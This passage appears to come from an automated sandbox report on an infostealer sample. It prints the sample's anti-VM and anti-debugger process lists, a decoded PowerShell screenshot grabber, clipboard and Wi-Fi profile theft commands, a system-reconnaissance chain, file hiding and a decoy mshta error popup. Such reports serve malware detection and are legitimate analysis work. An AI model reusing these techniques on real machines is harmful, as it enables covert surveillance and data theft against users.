            Source: rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: self.banned_process = ["HTTP Toolkit.exe", "httpdebuggerui.exe","wireshark.exe", "fiddler.exe", "regedit.exe", "taskmgr.exe", "vboxservice.exe", "df5serv.exe", "processhacker.exe", "vboxtray.exe", "vmtoolsd.exe", "vmwaretray.exe", "ida64.exe", "ollydbg.exe",
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vboxtray.exepC!
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: qemu-ga.exe
            Source: rename_me_before.exe, 00000001.00000003.1891156202.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1947237648.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966603181.000001B103364000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977271486.000001B100CAC000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1969941981.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1971439621.000001B100CAB000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1891031663.000001B101762000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1890887801.000001B10175B000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000003D.00000002.1787934637.000001EFE711A000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.1.dr | Binary or memory string: DISPLAY_NAME: Hyper-V Heartbeat Service
            Source: rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: elif b"vmware" in stdout2.lower():
            Source: rename_me_before.exe, 00000001.00000003.1966433527.000001B10039E000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1970636135.000001B1003A1000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1967629059.000001B10039F000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1972845949.000001B1003A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.2920698906.000001D218A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.2919335648.000001D21342B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: "vmsrvc.exe", # VirtualBox
            Source: rename_me_before.exe, 00000001.00000003.1966603181.000001B103364000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.1.dr | Binary or memory string: DISPLAY_NAME: Hyper-V Volume Shadow Copy Requestor
            Source: rename_me_before.exe, 00000001.00000003.1966603181.000001B103364000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1970864260.000001B10096C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1976544223.000001B10096C000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000003D.00000002.1787934637.000001EFE711A000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.1.dr | Binary or memory string: DISPLAY_NAME: Hyper-V Time Synchronization Service
            Source: rename_me_before.exe, 00000001.00000002.1980706775.000001B103351000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: E: vmicshutdown
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "vmwaretray.exe"0D!
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "vboxtray.exe"
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "vmwareuser.exe"pD!
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: b"vmware"
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmwaretray.exepU!
            Source: net1.exe, 00000030.00000002.1767121596.00000228A90E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Administrators
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: b"vmware"0
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmwareuser.exe
            Source: ROUTE.EXE, 0000003A.00000002.1785653815.000001C0E6679000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "vmwaretray.exe"0U!
            Source: rename_me_before.exe, 00000001.00000003.1946914217.000001B103351000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1891303123.000001B103351000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1980706775.000001B103351000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: DISPLAY_NAME: Hyper-V H?S
            Source: rename_me_before.exe, 00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: _process = ["HTTP Toolkit.exe", "httpdebuggerui.exe","wireshark.exe", "fiddler.exe", "regedit.exe", "taskmgr.exe", "vboxservice.exe", "df5serv.exe", "processhacker.exe", "vboxtray.exe", "vmtoolsd.exe", "vmwaretray.exe", "ida64.exe", "ollydbg.exe",
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmware
            Source: rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: "vmtoolsd.exe", # VMware
            Source: rename_me_before.exe, 00000001.00000003.1966603181.000001B103364000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000003D.00000002.1787934637.000001EFE711A000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.1.dr | Binary or memory string: DISPLAY_NAME: Hyper-V PowerShell Direct Service
            Source: rename_me_before.exe, 00000001.00000003.1948127865.000001B1028B9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: return any(x.lower() in decoded_output[2].strip().lower() for x in ("virtualbox", "vmware"))
            Source: rename_me_before.exe, 00000001.00000003.1946914217.000001B103351000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1891303123.000001B103351000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1980706775.000001B103351000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: DISPLAY_NAME: Hyper-V H?[
            Source: rename_me_before.exe, 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: "vboxtray.exe", # VirtualBox
            Source: rename_me_before.exe, 00000001.00000003.1891156202.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1947237648.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966603181.000001B103364000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977271486.000001B100CAC000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1969941981.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1971439621.000001B100CAB000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1891031663.000001B101762000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1890887801.000001B10175B000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.1.dr | Binary or memory string: DISPLAY_NAME: Hyper-V Data Exchange Service
            Source: rename_me_before.exe, 00000001.00000003.1946914217.000001B103351000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1891303123.000001B103351000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1980706775.000001B103351000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: E: Hyper-V Remote Deskto
            Source: rename_me_before.exe, 00000001.00000003.1966603181.000001B103364000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1970864260.000001B10096C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1976544223.000001B10096C000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.1.dr | Binary or memory string: DISPLAY_NAME: Hyper-V Guest Shutdown Service
            Source: rename_me_before.exe, 00000001.00000002.1979075425.000001B101E80000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: Hyper-V_EndRecData640
            Source: rename_me_before.exe, 00000001.00000003.1891156202.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1947237648.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966603181.000001B103364000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977271486.000001B100CAC000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1969941981.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1971439621.000001B100CAB000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.1.dr | Binary or memory string: DISPLAY_NAME: Hyper-V Guest Service Interface
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: b'VMware'
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmsrvc.exe
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vboxservice.exe
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "vboxservice.exe"
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmsrvc.exe0E!
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vboxtray.exe
            Source: rename_me_before.exe, 00000001.00000003.1946914217.000001B103351000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1891303123.000001B103351000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1980706775.000001B103351000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Guest Shutdown S
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "vmwaretray.exe"
            Source: rename_me_before.exe, 00000001.00000003.1946914217.000001B103351000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1891303123.000001B103351000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1980706775.000001B103351000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: DISPLAY_NAME: Hyper-V V
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmwaretray.exe
            Source: rename_me_before.exe, 00000001.00000003.1946802827.000001B1015CF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: # jVmCIddOhQT9W9J
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmtoolsd.exe
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "vmware"
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: 'qemu'
            Source: net1.exe, 00000030.00000002.1767121596.00000228A90E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Administratorsn
            Source: sc.exe, 0000003D.00000002.1787934637.000001EFE711A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Guest Service InterfacevmicguestinterfaceVirtual DiskvdsCredential ManagerVaultSvcVolumetric Audio Compositor ServiceVacSvcUpdate Orchestrator ServiceU
            Source: rename_me_before.exe, 00000001.00000003.1891156202.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1947237648.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966603181.000001B103364000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977271486.000001B100CAC000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1969941981.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1971439621.000001B100CAB000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1891031663.000001B101762000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1890887801.000001B10175B000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000003D.00000002.1787934637.000001EFE711A000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.1.dr | Binary or memory string: DISPLAY_NAME: Hyper-V Remote Desktop Virtualization Service
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "vmtoolsd.exe"
            Source: system_info.txt.1.dr | Binary or memory string: SERVICE_NAME: vmicvss
            Source: system_info.txt.1.dr | Binary or memory string: SERVICE_NAME: vmicheartbeat
            Source: rename_me_before.exe, 00000001.00000002.1980741579.000001B103362000.00000004.00000020.00020000.00000000.sdmp, system_info.txt.1.dr | Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
            Source: HOSTNAME.EXE, 00000028.00000002.1741152783.000002228E2E9000.00000004.00000020.00020000.00000000.sdmp, ARP.EXE, 0000003B.00000002.1786834187.000001BC86B99000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 0000003C.00000002.1787389526.000001EFEBDB9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: system_info.txt.1.dr | Binary or memory string: SERVICE_NAME: vmicshutdown
            Source: rename_me_before.exe, 00000001.00000003.1946914217.000001B103351000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1891303123.000001B103351000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1980706775.000001B103351000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: DISPLAY_NAME: Hyper-V Ti
            Source: rename_me_before.exe, 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1948127865.000001B1028B9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: hostNames = ['sandbox','cuckoo', 'vm', 'virtual', 'qemu', 'vbox', 'xen']
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "vmusrvc.exe"0
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "vmsrvc.exe"
            Source: sc.exe, 0000003D.00000002.1787934637.000001EFE711A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WLAN AutoConfigWlanSvcWindows Insider ServicewisvcWindows Remote Management (WS-Management)WinRMWindows Management InstrumentationWinmgmtWinHTTP Web Proxy Auto-Discovery ServiceWinHttpAutoProxySvcMicrosoft Defender Antivirus ServiceWinDefendStill Image Acquisition EventsWiaRpcWi-Fi Direct Services Connection Manager ServiceWFDSConMgrSvcWindows Error Reporting ServiceWerSvcProblem Reports Control Panel SupportwercplsupportWindows Encryption Provider Host ServiceWEPHOSTSVCWindows Event CollectorWecsvcWebClientWebClientMicrosoft Defender Antivirus Network Inspection ServiceWdNisSvcDiagnostic System HostWdiSystemHostDiagnostic Service HostWdiServiceHostWindows Connect Now - Config RegistrarwcncsvcWindows Connection ManagerWcmsvcWindows Biometric ServiceWbioSrvcBlock Level Backup Engine ServicewbengineWarpJITSvcWarpJITSvcWalletServiceWalletServiceWindows TimeW32TimeVolume Shadow CopyVSSHyper-V Volume Shadow Copy RequestorvmicvssHyper-V PowerShell Direct ServicevmicvmsessionHyper-V Time Synchronization ServicevmictimesyncHyper-V Guest Shutdown ServicevmicshutdownHyper-V Remote Desktop Virtualization ServicevmicrdvHyper-V Data Exchange ServicevmickvpexchangeHyper-V Heartbeat Servicevmicheartbeat
            Source: rename_me_before.exe, 00000001.00000003.1946914217.000001B103351000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1891303123.000001B103351000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1980706775.000001B103351000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: E: Hyper-V PowerShell Di
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "vmusrvc.exe"
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: qemupR!
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmusrvc.exepF!
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmware`
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "qemu-ga.exe"
            Source: rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: "vmacthlp.exe", # VMware
            Source: rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: if b'VMware' in stdout:
            Source: rename_me_before.exe, 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: "vmsrvc.exe"
            Source: C:\Windows\System32\wbem\WMIC.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\rename_me_before.exe | Code function: 0_2_00007FF6404EC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6404EC44C
            Source: C:\Users\user\Desktop\rename_me_before.exe | Code function: 0_2_00007FF640502790 GetProcessHeap,0_2_00007FF640502790
            Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
            Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
            Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Windows\System32\tasklist.exe | Process token adjusted: Debug
            Source: C:\Windows\System32\NETSTAT.EXE | Process token adjusted: Debug
            Source: C:\Windows\System32\NETSTAT.EXE | Process token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\rename_me_before.exe | Code function: 0_2_00007FF6404EBBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6404EBBC0
            Source: C:\Users\user\Desktop\rename_me_before.exe | Code function: 0_2_00007FF6404EC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6404EC44C
            Source: C:\Users\user\Desktop\rename_me_before.exe | Code function: 0_2_00007FF6404EC62C SetUnhandledExceptionFilter,0_2_00007FF6404EC62C
            Source: C:\Users\user\Desktop\rename_me_before.exe | Code function: 0_2_00007FF6404F9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6404F9924
            Source: C:\Users\user\Desktop\rename_me_before.exe | Code function: 1_2_00007FF6404EBBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF6404EBBC0
            Source: C:\Users\user\Desktop\rename_me_before.exe | Code function: 1_2_00007FF6404EC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF6404EC44C
            Source: C:\Users\user\Desktop\rename_me_before.exe | Code function: 1_2_00007FF6404EC62C SetUnhandledExceptionFilter,1_2_00007FF6404EC62C
            Source: C:\Users\user\Desktop\rename_me_before.exe | Code function: 1_2_00007FF6404F9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF6404F9924

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
            Source: C:\Windows\System32\cmd.exe | Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
            Source: C:\Windows\System32\cmd.exe | Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
            Source: C:\Users\user\Desktop\rename_me_before.exe | Process created: C:\Users\user\Desktop\rename_me_before.exe "C:\Users\user\Desktop\rename_me_before.exe"
            Source: C:\Users\user\Desktop\rename_me_before.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
            Source: C:\Users\user\Desktop\rename_me_before.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            Source: C:\Users\user\Desktop\rename_me_before.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Users\user\Desktop\rename_me_before.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe""
            Source: C:\Users\user\Desktop\rename_me_before.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Users\user\Desktop\rename_me_before.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\rename_me_before.exe | Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
            Source: C:\Users\user\Desktop\rename_me_before.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            Source: C:\Users\user\Desktop\rename_me_before.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
            Source: C:\Users\user\Desktop\rename_me_before.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
            Source: C:\Users\user\Desktop\rename_me_before.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
            Source: C:\Users\user\Desktop\rename_me_before.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            Source: C:\Users\user\Desktop\rename_me_before.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\HOSTNAME.EXE hostname
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net user
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\query.exe query user
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net localgroup
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net localgroup administrators
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net user guest
